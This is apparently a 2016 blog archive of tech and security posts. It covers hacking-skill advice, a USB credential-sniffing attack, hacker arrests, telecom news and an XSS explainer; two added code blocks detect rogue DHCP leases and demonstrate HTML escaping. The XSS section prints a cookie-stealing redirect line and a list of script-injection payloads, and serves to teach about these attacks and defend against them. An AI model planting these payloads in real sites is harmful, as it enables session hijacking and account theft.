Friday, 9 September 2016

What skills do I need to learn to become a computer hacker?

If you don't have that passion for computers, you will never be a hacker. You can be a programmer, a computer scientist, world-famous in the IT field ... but not a hacker.

If you do have that passion, then it's possible ... but never easy. The following steps are for being a hacker on the software side ... these steps will be different for other endeavors.


* Learn about operating systems. Learn about operating systems you don't like. Learn about operating systems you would prefer to never use. Don't just concentrate on the fun stuff.
* Learn to program. Remember, programming is not language dependent. Don't worry about languages or programming style--yeah, you have to start with one programming language, but if you can learn to program in C, you can program in damn near anything. But avoid BASIC, if at all possible.
* Learn operations. Learn how networks work, how the processor works, how memory works. You don't have to be a hardware guru (though if that's where your passion lies, go for it), but you do have to have at least some understanding of how the hardware works.
* Most important--NEVER STOP LEARNING! You will never learn everything about computer programming, not if you lived to be 1000 years old. You can learn from the crusty old Unix master who hasn't left his office in five years (because he doesn't have to), and you can learn from the shiny new wet-behind-the-ears intern who just hired on last week. The day you figure you have nothing left to learn, put down your keyboard and walk away, because your brain just stopped functioning.
The short answer is, all the skills required to do the task you want to do. For example, web application hacking? You will want to learn about the following topics:
  • Database architectures (i.e. different types of database engines)
  • SQL syntax (differences between MSSQL and MySQL, etc)
  • HTTP protocol (incl. how to send raw requests)
  • SSL/TLS issues and misconfigurations
  • Intercepting proxies (like Burp Suite and Owasp Zap)
  • Web application attacks (SQL Injection, RCE, RFI, LFI, XSS, CSRF, XST, etc. To learn about these attacks, check out the OWASP Testing Guide, it's free.)
  • How files and file permissions work on Windows and Linux
  • Being able to read and understand either ASP, ASP.NET, PHP or Java for source review purposes. (Can also be used to help developers create fixes to issues you've discovered. This skill is also required for e.g. code injection 0days you discover.)
  • Knowledge about web application scanners, their weaknesses and strengths, etc. (This skill is pretty easy to obtain, but is gained over time the more you use different scanners and learn which ones are generally the best for your projects. FYI actively scanning a web application without permission is generally illegal.)
  • Web services architecture
  • Web services vulnerabilities
Note: The list above is not exhaustive but does include the majority of information you will need to be able to hack a web application.

Turing’s 2018 phone to have three Snapdragon 830s, 18GB RAM, 1.2TB storage


Turing Robotics Industries (TRI) is back with some more craziness after introducing the Turing Phone Cadenza last week. The company has just announced the Turing Monolith Chaconne, a smartphone with specs even stranger than its name, through an email newsletter.
The above announcement by TRI comes two months after the firm finally managed to ship the pilot Turing Phone, a crowdfunded Android handset, to early backers, after much delay and some revisions.
Coming to Turing Monolith Chaconne, let’s have a look at its specifications at a glance:
• 3 Qualcomm Snapdragon 830 processors, 6.4-inch 4K display with 2160×3840 pixel resolution
• 18GB of LPDDR4X RAM (or 3 x 6GB memory chips)
• 1.2TB of storage (3 x 256GB memory, 512GB via microSD card)
• 60MP quad rear camera with Triplet Lens/T1.2 and iMAX 6K
• 20MP dual front camera
• Swordfish OS with deep learning (AI) features based on Sailfish OSS
• 120 Wh battery based on 3,600mAh Graphene Super-capacitor + 2,400mAh Li-Ion + Hydrogen Fuel Cell
• WiGig support, Marshall audio, A.L.A.N
• Advanced AI Voice-Authenticated Power On/Off
• Four Nano-SIM support
• Graphene Oxide composite bodywork with Liquid Metal 2.0 Structural Frame, Lightweight Metal Outer Frame, High Temperature Alloy Components
• 4G + VoLTE, 3G, GSM
• Augmented Reality: Parallel Tracking & Mapping API
Steve Chao, CEO of TRI, in an email newsletter explains how it is going to connect the three Snapdragon 830 SoCs in the smartphone:
“TRI plans on connecting multiple CPUs via WiGig by implementing an ad-hoc driver to the 60GHz channel via on-board USB3.0. This complicated computing process stores a transient matrix in SSD of CPU(1), then it recomputes and shares the transient matrix with the other SSD of CPU(2) simultaneously. This results in the CPUs sharing their computing power in parallel. Such proprietary technology enables TRI to achieve never-seen-before computing power on a mobile device. So what exactly is this technology intended for? The answer is – Computational Intelligence (CI).”
The Turing Monolith Chaconne is expected to be released in 2018. Whether or not the company will be able to launch this device next year and keep its promise, only time will tell. TRI also says that it will make its presence felt in Salo, Finland and start building prototypes for the Turing Phone Cadenza in a manufacturing facility right where Nokia and Microsoft used to produce their mobile phone prototypes.

Here are the 5 reasons why some Google employees live in parking lots


Google Inc. is the world’s largest search engine site that specializes in Internet-related services and products. Constantly ranked as the best company to work for, Google employees are among the highest-paid in the world.
“The benefits and care of employees is obviously world class, and compensation is almost unmatchable. But the company attracts some of the best talent and best people to work with in the world, which is the most important bit.” – Google Program Manager (San Francisco, CA).
To stay at the top, the company expects its employees to put in extra hours. As a result, employees spending long hours at Google is reportedly quite common. It turns out that some employees almost never leave the campus and start living in the parking lot!
There’s even a Quora thread about it. Here’s a look at 5 reasons Google employees prefer to live in parking lots and how easy it is…
Check out 5 reasons why some Google employees choose to live in parking lots

High rents

As the rent in South Bay area was too high, Ben Discoe decided to live at the Google campus, as he already had a house payment and alimony to pay. Hence, he stayed at the Google campus for a period of 13 months – October 2011 to November 2012. It turned out that living in a parking lot was more suitable.
When he started living on the campus, the security team at Google used to keep a watch on him. However, they left him alone once they were convinced that he was just an eccentric Googler.

To save money

Brandon Oxendine, a 23-year-old, lived in a Google parking lot from June 28, 2013 to September 22, 2013. He bought a station wagon, furnished it with two mattresses and put up curtains on the windows.
According to Oxendine’s blog, his 20s are the time to save some money and reach financial freedom. Hence, he chose to live in the parking lot. “If I do plan on traveling the world, I’ll need to be comfortable with unconventional living situations, and this is certainly a good place to start,” he says.
Another Google employee, whose name was not cited in the Quora thread, stayed like a camper in the tent on campus. He saved up enough in 2-3 years to buy himself a house.

On a challenge

Matthew J Weaver started living in a Google parking lot on a challenge and says “it was excellent for my career.” According to a Fox News report, although Google does not have a policy permitting employees to sleep on campus, the security team “even kept a lookout on Weaver’s mobile home when he was away.”
When the weather was suitable, he would even hold parties in his RV on Thursdays, Weaver wrote. However, he says it was a little tough to explain to women he was dating why he lived in a parking lot.

Could not find accommodation

One Googler who had moved from the Mountain View headquarters to the London office could not find a place to stay.
He decided to stay at the office until permanent accommodation could be arranged. However, instead of staying in the parking lot, he slept under his desk for a week.

Not too difficult to stay

Living in a Google parking lot, or somewhere else on campus for that matter, turns out not to be that difficult.
Those employees who stayed at the campus for extended periods said that they showered at the gym and ate their meals at the office (Google provides free meals for all employees). Even laundry is not a problem, as employees can do their laundry on campus. Also, anytime you feel the need to use the restroom, “just walk the short distance to the nearest Google building and badge in,” writes Discoe.

Thursday, 8 September 2016

How to Hack Windows/Mac OS X Login Password (When Locked)

A security researcher has discovered a unique attack method that can be used to steal credentials from a locked (but logged-in) computer and works on both Windows and Mac OS X systems.

In his blog post published today, security expert Rob Fuller demonstrated and explained how to exploit a USB SoC-based device to turn it into a credential-sniffer that works even on a locked computer or laptop.

Fuller modified the firmware code of a USB dongle in such a way that, when it is plugged in as a USB Ethernet adapter, the plug-and-play device installs itself and acts as the network gateway, DNS server, and Web Proxy Auto-discovery Protocol (WPAD) server for the victim's machine.
The attack is possible because most PCs automatically install Plug-and-Play USB devices, meaning "even if a system is locked out, the device [dongle] still gets installed," Fuller explains in his blog post.
"Now, I believe there are restrictions on what types of devices are allowed to install at a locked out state on newer operating systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list."

How does the Attack Work?

You might be wondering: why does your computer automatically share Windows credentials with any connected device?

That is because of the default behavior of Microsoft Windows' name resolution services, which can be abused to steal authentication credentials.
The modified plug-and-play USB Ethernet adapter runs a piece of software, Responder, which spoofs name-resolution responses on the network to intercept hashed credentials and then stores them in an SQLite database.

The hashed credentials collected by the network exploitation tool can later be easily brute-forced to get clear text passwords.

Apparently, to conduct this attack, attackers would require physical access to a target computer, so that they can plug in the evil USB Ethernet adapter. However, Fuller says the average time required for a successful attack is just 13 seconds.


Fuller successfully tested his attack against Windows 98 SE, Windows 2000 SP4, Windows XP SP3, Windows 7 SP1, Windows 10 Enterprise and Home (but not Windows 8), as well as OS X El Capitan and OS X Mavericks. He’s also planning to test it against several Linux distros.

Fuller tested the attack with two USB Ethernet dongles: the USB Armory and the Hak5 Turtle. For a more detailed explanation, head over to his blog post.
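The attack above works because the dongle hands the host a DHCP lease in which the dongle itself is the router, the DNS server and (through the de facto WPAD option 252) the proxy auto-discovery server. The following is an added defender-side example, not Fuller's code: it parses a DHCP OFFER/ACK from raw bytes and flags that combination. The sample offer, its 169.254.x addresses and the WPAD URL are constructed for the demonstration.

```python
import ipaddress
import struct

# DHCP option codes used below (RFC 2132; 252 is the de facto WPAD option
# that Windows proxy auto-discovery consults).
DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_PAD, OPT_SUBNET, OPT_ROUTER, OPT_DNS = 0, 1, 3, 6
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_WPAD, OPT_END = 53, 54, 252, 255
MSG_OFFER, MSG_ACK = 2, 5


def parse_dhcp_options(packet: bytes) -> dict:
    """Return {option_code: raw_value} from a BOOTP/DHCP packet; ValueError if malformed."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet (missing magic cookie)")
    opts = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def _ipv4_list(raw: bytes) -> list:
    """Decode a run of 4-byte addresses (router / DNS options may carry several)."""
    return [str(ipaddress.IPv4Address(raw[k:k + 4])) for k in range(0, len(raw) - 3, 4)]


def assess_dhcp_lease(packet: bytes) -> dict:
    """Summarise an OFFER/ACK and flag the 'one device is gateway, DNS and WPAD' pattern."""
    opts = parse_dhcp_options(packet)
    msg_type = (opts.get(OPT_MSG_TYPE) or b"\x00")[0]
    if msg_type not in (MSG_OFFER, MSG_ACK):
        return {"relevant": False, "findings": [], "suspicious": False}
    server = _ipv4_list(opts.get(OPT_SERVER_ID, b""))
    routers = _ipv4_list(opts.get(OPT_ROUTER, b""))
    dns = _ipv4_list(opts.get(OPT_DNS, b""))
    wpad = opts.get(OPT_WPAD, b"").rstrip(b"\x00").decode("ascii", "replace")
    findings = []
    if wpad:
        findings.append("lease pushes a WPAD URL (%s): proxy settings come from the link peer" % wpad)
    if server and routers == server:
        findings.append("DHCP server names itself as the only router")
    if server and dns == server:
        findings.append("DHCP server names itself as the only DNS server")
    return {"relevant": True, "server": server, "routers": routers, "dns": dns,
            "wpad": wpad, "findings": findings, "suspicious": len(findings) >= 2}


def build_dhcp_offer(server_ip: str, client_ip: str, routers: list, dns: list, wpad: str = "") -> bytes:
    """Construct a minimal DHCP OFFER; demo input only, not captured traffic."""
    def opt(code: int, value: bytes) -> bytes:
        return bytes([code, len(value)]) + value
    header = struct.pack("!BBBBIHH4s4s4s4s", 2, 1, 6, 0, 0x3903F326, 0, 0, b"\x00" * 4,
                         ipaddress.IPv4Address(client_ip).packed,
                         ipaddress.IPv4Address(server_ip).packed, b"\x00" * 4)
    header += b"\x00" * (16 + 64 + 128)            # chaddr, sname, file
    body = DHCP_MAGIC + opt(OPT_MSG_TYPE, bytes([MSG_OFFER]))
    body += opt(OPT_SERVER_ID, ipaddress.IPv4Address(server_ip).packed)
    body += opt(OPT_SUBNET, ipaddress.IPv4Address("255.255.255.0").packed)
    body += opt(OPT_ROUTER, b"".join(ipaddress.IPv4Address(r).packed for r in routers))
    body += opt(OPT_DNS, b"".join(ipaddress.IPv4Address(d).packed for d in dns))
    if wpad:
        body += opt(OPT_WPAD, wpad.encode("ascii"))
    return header + body + bytes([OPT_END])


if __name__ == "__main__":
    # Constructed rogue lease: the same address is server, router, DNS and WPAD host.
    rogue = build_dhcp_offer("169.254.1.1", "169.254.1.10", ["169.254.1.1"], ["169.254.1.1"],
                             wpad="http://169.254.1.1/wpad.dat")
    for line in assess_dhcp_lease(rogue)["findings"]:
        print("-", line)
```

A lease like the rogue one on an interface that appeared seconds ago is the signal to correlate with a new USB network device; on its own it is also what a legitimate captive portal looks like, so treat it as a lead, not a verdict.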

Two Hackers who hacked US Spy Chief, Arrested by FBI

US authorities have arrested two North Carolina men on charges that they were part of the notorious hacking group "Crackas With Attitude."
Crackas with Attitude is the group of hackers that was allegedly behind a series of audacious and embarrassing hacks targeting the personal email accounts of senior officials at the CIA, FBI, the White House, the Homeland Security Department, and other US federal agencies.

Andrew Otto Boggs, 22, of North Wilkesboro, N.C., who allegedly used the handle "INCURSIO," and Justin Gray Liverman, 24, of Morehead City, known online as "D3F4ULT," were arrested on Thursday morning on charges related to their alleged roles in the computer hacking, according to a press release by the Department of Justice.
A 16-year-old British teenager suspected of being part of the group was arrested in February by the FBI and British police.

Although court documents did not name the victims, the hacking group had allegedly:
  • Hacked into the AOL email of CIA director John Brennan and released personal details.
  • Hacked into the personal emails and phone accounts of the US spy chief James Clapper.
  • Broke into the AOL email of the FBI Deputy Director Mark Giuliano.
Cracka also leaked the personal details of 31,000 government employees: nearly 20,000 FBI agents, 9,000 Department of Homeland Security (DHS) officers and an unspecified number of DoJ staffers.
"In some instances, members of the conspiracy uploaded private information that they obtained from victims’ personal accounts to public websites; made harassing phone calls to victims and their families; and defaced victims’ social media accounts," reads the press release.

According to FBI officials, between October 2015 and February 2016 the hacking group used social engineering to trick the victims into revealing their account numbers, passwords, and other details.

Boggs and Liverman will be extradited next week to the Eastern District of Virginia, where federal prosecutors have spent months building a case against Crackas With Attitude.

Robotics: Remote control Car at Niks Technology

A robotics project by Niks Technology: a remote control car with great features. Have a look! The most amazing part is that it costs less than 250-300 INR.

This remote control car was built at Niks Technology. It has many features, for example it can rotate at 0 degrees, and yes, it costs only 250-300 INR.

Remote controlled toys are any type of toy that can be controlled remotely.

There are four components of a remote controlled vehicle. The first component is the transmitter, which is the controller that the user has in their hand. This controller sends a signal, such as a radio wave, to the car. The receiver, such as an antenna and circuit board, sits inside of the toy and it takes the signal from the transmitter. When the receiver gets the signal, it activates motors inside the toy depending on the signal that the transmitter gives out. The motors inside of the toy are what allow the toy to be steered, to turn wheels, operate propellers, and do various other tasks. The final component of a remote controlled toy is the power source, which is usually a battery that is placed inside of the transmitter.

Tuesday, 6 September 2016

20 Things You Didn't Know About... Computer Hacking

What's the connection between Steve Wozniak, the Pope, and Henry Kissinger? That's right, it's hacking.

1  Hacker originally meant “one who makes furniture with an ax.” Perhaps because of the blunt nature of that approach, the word came to mean someone who takes pleasure in an unconventional solution to a technical obstacle.
2  Computer hacking was born in the late 1950s, when members of MIT’s Tech Model Railroad Club, obsessed with electric switching, began preparing punch cards to control an IBM 704 mainframe.
3  One of the club’s early programs: code that illuminated lights on the mainframe’s console, making it look like a ball was zipping from left to right, then right to left with the flip of a switch. Voilà: computer Ping-Pong!
4  By the early 1970s, hacker “Cap’n Crunch” (a.k.a. John Draper) had used a toy whistle to match the 2,600-hertz tone used by AT&T’s long-distance switching system. This gave him access to call routing (and brief access to jail).
5  Before they struck it rich, Apple founders Steve Wozniak and Steve Jobs made and sold “blue boxes,” electronic versions of Draper’s whistle.
6  Using a blue box, Wozniak crank-called the Pope’s residence in Vatican City and pretended to be Henry Kissinger.
7  Hacking went Hollywood in the 1983 movie WarGames, about a whiz kid who breaks into a Defense Department computer and, at one point, hijacks a pay phone by hot-wiring it with a soda can pull-ring.
8  That same year, six Milwaukee teens hacked into Los Alamos National Lab, which develops nuclear weapons.
9  In 1988 Robert T. Morris created a worm, or self-replicating program, purportedly to evaluate Internet security.
10  The worm reproduced too well, however. The multimillion-dollar havoc that ensued led to Morris’s felony conviction, one of the first under the Computer Fraud and Abuse Act.
11  They all come home eventually. Morris now researches computer science at... MIT.
12  British hacker Gary McKinnon broke into 97 U.S. Navy, Army, Pentagon, and NASA computers in 2001 and 2002.
13  McKinnon’s defense: He wasn’t hunting military secrets; he was only seeking suppressed government files about space aliens.
14  According to rumor, agents of China’s People’s Liberation Army attempted to hack the U.S. power grid, triggering the great North American blackout of 2003.
15  It took IBM researcher Scott Lunsford just one day to penetrate the network of a nuclear power station: “I thought, ‘Gosh, this is a big problem.’”
16  Unclear on the concept: When West Point holds its annual cyberwar games, the troops wear full fatigues while fighting an enemy online.
17  Think your Mac is hackproof? At this year’s CanSecWest conference, security researcher Charlie Miller used a flaw in Safari to break into a MacBook in under 10 seconds.
18  Cyborgs beware: Tadayoshi Kohno at the University of Washington recently hacked into a wireless defibrillator, causing it to deliver fatal-strength jolts of electricity.
19  This does not bode well for patients receiving wireless deep-brain stimulators.
20  The greatest kludge of all? Roger Angel of the University of Arizona has proposed building a giant sunscreen in space to hack the planet’s climate.

What happens to S Tel Telecom Ltd. India? 32 GB 3G at 32 RS.

S Tel Private Limited was a GSM based cellular operator in India. It had unified access service licenses to operate in the circles of Orissa, Bihar, Himachal Pradesh, North East, Assam and Jammu & Kashmir. It was owned jointly by C Sivasankaran (51%) and Bahrain Telecommunications (49%).
On 2 February 2012 the Supreme Court of India quashed all 122 spectrum licences granted during the tenure of former communications minister A Raja. Six licences of S Tel were cancelled, and Batelco sold its share of S Tel. Batelco was the first foreign operator to cease operations in India following the 2G spectrum scam. The sale was to be completed by the end of October 2012.
At its peak, S Tel had operations in 5 Category C circles – Orissa, Bihar, Himachal Pradesh, North East and Assam. The company was also in the process of launching its services in the northernmost circle of Jammu & Kashmir. These licenses enabled the company to provide Unified Mobile service, wireless broadband and innovative Value Added Services (VAS) covering a population of over 226 million across these circles. S Tel had approximately 3.6 million subscribers as of February 2012 just before the cancellation of its licenses and subsequent closure of its entire business.

S Tel Mobile Service Goes Down In Various Part of India, Customers Irked

After the Cheers Mobile (Etisalat DB) outage, it is now the turn of another small GSM operator, S Tel, which has been down in Orissa, Bihar-Jharkhand and other circles for the last 12 days.
We have been getting constant complaints from STel subscribers in Orissa and Jharkhand, and one of our readers, Sonu, alerted us regarding the same.
Like Cheers Mobile, STel has a passive infrastructure sharing agreement with Reliance Communications for the 4 telecom circles, and according to our exclusive sources RCom has disconnected STel's service from more than 700 BTS (mobile towers) across the 4 circles.
When we contacted the customer care officials of STel (Orissa), we were told that the network problem customers are facing now is a temporary one, and that they expect it to be resolved soon.
We were also told that experts are working around the clock to restore the network, which is taking slightly longer than expected, and assured that every possible effort is being made to restore the network as soon as possible.
It is very surprising to see an operator like S Tel that didn't even come forward to alert its customers after more than 12 days of downtime, whereas in the case of Cheers Mobile the company alerted its customers the very next day and apologized for the inconvenience.
We hope that at least after reading this, S Tel officials will come forward and tell their customers and the public what is happening and when things will be fixed.

What Happens to 3G Spectrum in 3 Circles Alloted to S-Tel?

Amidst all the telecom related mess, it seems everyone is concerned only about 2G spectrum: its policy, allocation, reserve price and so on. The whole thing is messed up, considering that 2G spectrum is mainly for voice, which is in turn the bread and butter for consumers and operators.
But the Govt. is not doing anything to get back the 3G spectrum from STel, one of the operators whose licenses were cancelled by court order in February 2012. At that time STel was operating in 5 circles, Himachal Pradesh, Assam, Orissa, Bihar-Jharkhand and North East, and offering 2G/GSM voice and data services.
In 2008 STel got spectrum and UASL in 6 category ‘C’ circles including Jammu and Kashmir. When the operator’s licence was cancelled in February 2012, its foreign investor BaTelco (currently BaTelco is looking for a comeback in India via Reliance Communications’s Globalcom) sold its entire stake to Indian partner Sky City Foundation. Siva Group, headed by Sivasankaran, has the majority stake in STel. STel also won 5MHz of 3G spectrum in the 2100 MHz band in Orissa, Himachal Pradesh and Bihar in a valid auction process in 2010; the ownership of those 3G airwaves still belongs to STel. The company did not roll out 3G services in any of the circles, while its website reads that STel’s network is a 3G-ready network.
At present STel's website ( is still alive and offers the MNP procedure. Shiva Group’s website also lists STel as the company’s telecom project and writes that STel owns the 3G spectrum while its 2G licences were cancelled. Just after the cancellation of its licenses the company wrote to the Prime Minister that it would return the spectrum if the Govt. agreed to refund, with interest, the money spent on acquiring 2G and 3G spectrum. STel does not seem to be in a position, or to have the desire, to restart its business in India, as the company did not participate in any of the recent 2G auctions (Nov 2012 and March 2013).
So the solution is simple: take back the 2100MHz spectrum from STel, refund the money it paid in the 2010 3G auction along with interest, and conduct a small 3G spectrum auction for these three circles. Though I doubt anyone can invest in 3G in those category ‘C’ circles except Telenor, who are still giving priority to voice markets.
But is there any movement from the Govt to get back STel’s 3G spectrum? No. Nobody knows why. Keeping 3G spectrum unused is no good.

Sunday, 4 September 2016

Where to Learn SQL injection? | Learn SQL injection easily

First of all, let me tell you about SQL injection. According to Wikipedia:
SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
In a 2012 study, it was observed that the average web application received 4 attack campaigns per month, and retailers received twice as many attacks as other industries.
You can easily learn SQL injection online or offline; there is no real difference between the two modes. For example, if you choose to learn online, you can learn at W3Schools.
And if you opt for offline mode, it's just as easy for you. You can even interact with your teachers for a better understanding.
Yes, of course I am a learner now, and even I am learning SQL injection! I think some of you want to know where I am learning from.
"I am learning online, from various video tutorials!"
So I think now you have the answer to the question "Where to Learn SQL Injection?"

Saturday, 3 September 2016

XSS Cross Site Scripting Attack

Cross-site Scripting (XSS) Attack

Source :- Acunetix
Cross-site Scripting (XSS) refers to a client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) in a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
By leveraging XSS, an attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.
While XSS can be taken advantage of within VBScript, ActiveX and Flash (although now considered legacy or even obsolete), unquestionably, the most widely abused is JavaScript – primarily because JavaScript is fundamental to most browsing experiences.

How Cross-site Scripting works

In order to run malicious JavaScript code in a victim’s browser, an attacker must first find a way to inject a payload into a web page that the victim visits. Of course, an attacker could use social engineering techniques to convince a user to visit a vulnerable page with an injected JavaScript payload.
In order for an XSS attack to take place the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the web page and treated as code by the victim’s browser.
The following server-side pseudo-code is used to display the most recent comment on a web page.
print "<html>"
print "<h1>Most recent comment</h1>"
print database.latestComment
print "</html>"
The above script is simply printing out the latest comment from a comments database and printing the contents out to an HTML page, assuming that the comment printed out only consists of text.
The above page is vulnerable to XSS because an attacker could submit a comment that contains a malicious payload such as <script>doSomethingEvil();</script>.
Users visiting the web page will get served the following HTML page.
<html>
<h1>Most recent comment</h1>
<script>doSomethingEvil();</script>
</html>
When the page loads in the victim’s browser, the attacker’s malicious script will execute, most often without the user realizing or being able to prevent such an attack.
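The comment page above, as an added example that is not the article's code: a small Python renderer in the vulnerable form the pseudo-code describes, next to a hardened form that HTML-encodes the comment before placing it in the output, with a parser-based check of whether a live script tag survives. The comments and author names are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# The comment the article's attacker submits.
PAYLOAD_COMMENT = "<script>doSomethingEvil();</script>"


def render_vulnerable(latest_comment: str) -> str:
    # Mirrors the pseudo-code: the stored comment is concatenated straight into the HTML,
    # so markup inside the comment is parsed as markup by the victim's browser.
    return "<html><h1>Most recent comment</h1>" + latest_comment + "</html>"


def render_safe(latest_comment: str) -> str:
    # Output encoding for the HTML-body context: &, <, >, " and ' become entities.
    # The browser displays the comment as text and never sees a <script> element.
    return "<html><h1>Most recent comment</h1>" + html.escape(latest_comment, quote=True) + "</html>"


def render_attribute_safe(author: str) -> str:
    # A different output context: inside a quoted attribute the quote itself must be
    # encoded, otherwise a crafted author name could close the attribute early.
    return '<div class="comment" data-author="' + html.escape(author, quote=True) + '"></div>'


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser-like tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag == "script":
            self.script_tags += 1


def count_script_tags(page_html: str) -> int:
    """Return how many <script> elements the rendered page actually contains."""
    parser = _ScriptCounter()
    parser.feed(page_html)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    for label, page in (("vulnerable", render_vulnerable(PAYLOAD_COMMENT)),
                        ("safe", render_safe(PAYLOAD_COMMENT))):
        print(label, "->", count_script_tags(page), "script tag(s):", page)
```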

What’s the worst an attacker can do with JavaScript?

The consequences of what an attacker can do with the ability to execute JavaScript on a web page may not immediately stand out, especially since browsers run JavaScript in a very tightly controlled environment and that JavaScript has limited access to the user’s operating system and the user’s files.
However, when considering that JavaScript has access to the following, it’s easier to understand how creative attackers can get with JavaScript.
  • Malicious JavaScript has access to all the same objects the rest of the web page has, including access to cookies. Cookies are often used to store session tokens, if an attacker can obtain a user’s session cookie, they can impersonate that user.
  • JavaScript can read and make arbitrary modifications to the browser’s DOM (within the page that JavaScript is running).
  • JavaScript can use XMLHttpRequest to send HTTP requests with arbitrary content to arbitrary destinations.
  • JavaScript in modern browsers can leverage HTML5 APIs such as accessing a user’s geolocation, webcam, microphone and even the specific files from the user’s file system. While most of these APIs require user opt-in, XSS in conjunction with some clever social engineering can bring an attacker a long way.
The above, in combination with social engineering, allow attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. Critically, XSS vulnerabilities provide the perfect ground for attackers to escalate attacks to more serious ones.

“Isn’t Cross-site scripting the user’s problem?”

If an attacker can abuse an XSS vulnerability on a web page to execute arbitrary JavaScript in a visitor’s browser, the security of that website or web application and its users has been compromised. XSS is not the user’s problem; like any other security vulnerability, if it’s affecting your users, it will affect you.

The anatomy of a Cross-site Scripting attack

An XSS attack needs three actors: the website, the victim and the attacker.
In the example below, it shall be assumed that the attacker’s goal is to impersonate the victim by stealing the victim’s cookie. Sending the cookie to a server the attacker controls can be achieved in a variety of ways, one of which is for the attacker to execute the following JavaScript code in the victim’s browser through an XSS vulnerability.
   window.location = "" + document.cookie
The following steps, illustrated in the original article's figure (“A typical example of how XSS works”), walk through a simple XSS attack.
  1. The attacker injects a payload in the website’s database by submitting a vulnerable form with some malicious JavaScript
  2. The victim requests the web page from the website
  3. The website serves the victim’s browser the page with the attacker’s payload as part of the HTML body.
  4. The victim’s browser will execute the malicious script inside the HTML body. In this case it would send the victim’s cookie to the attacker’s server. The attacker now simply needs to extract the victim’s cookie when the HTTP request arrives to the server, after which the attacker can use the victim’s stolen cookie for impersonation.

Some examples of Cross-site Scripting attack vectors

The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.

<script> tag

The <script> tag is the most straight-forward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.

<!-- External script -->
<script src=></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>

<body> tag

An XSS payload can be delivered inside <body> tag by using the onload attribute or other more obscure attributes such as the background attribute.
<!-- onload attribute -->
<body onload=alert("XSS")>
<!-- background attribute -->
<body background="javascript:alert('XSS')">

<img> tag

Some browsers will execute JavaScript when found in the <img>.
<!-- <img> tag XSS -->
<img src="javascript:alert('XSS');">
<!-- <img> tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">

<iframe> tag

The <iframe> tag allows the embedding of another HTML page into the parent page. An IFrame can contain JavaScript, however, it’s important to note that the JavaScript in the iFrame does not have access to the DOM of the parent’s page due to the browser’s Content Security Policy (CSP). However, IFrames are still a very effective means of pulling off phishing attacks.
<!-- <iframe> tag XSS -->
<iframe src="">

<input> tag

In some browsers, if the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.
<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">

<link> tag

The <link> tag, which is often used to link to external style sheets, could contain a script.
<!-- <link> tag XSS -->
<link rel="stylesheet" href="javascript:alert('XSS');">

<table> tag

The background attribute of the table and td tags can be exploited to refer to a script instead of an image.
<!-- <table> tag XSS -->
<table background="javascript:alert('XSS')">
<!-- <td> tag XSS -->
<td background="javascript:alert('XSS')">

<div> tag

The <div> tag, similar to the <table> and <td> tags can also specify a background and therefore embed a script.
<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">

<object> tag

The <object> tag can be used to include a script from an external site.
<!-- <object> tag XSS -->
<object type="text/x-scriptlet" data="">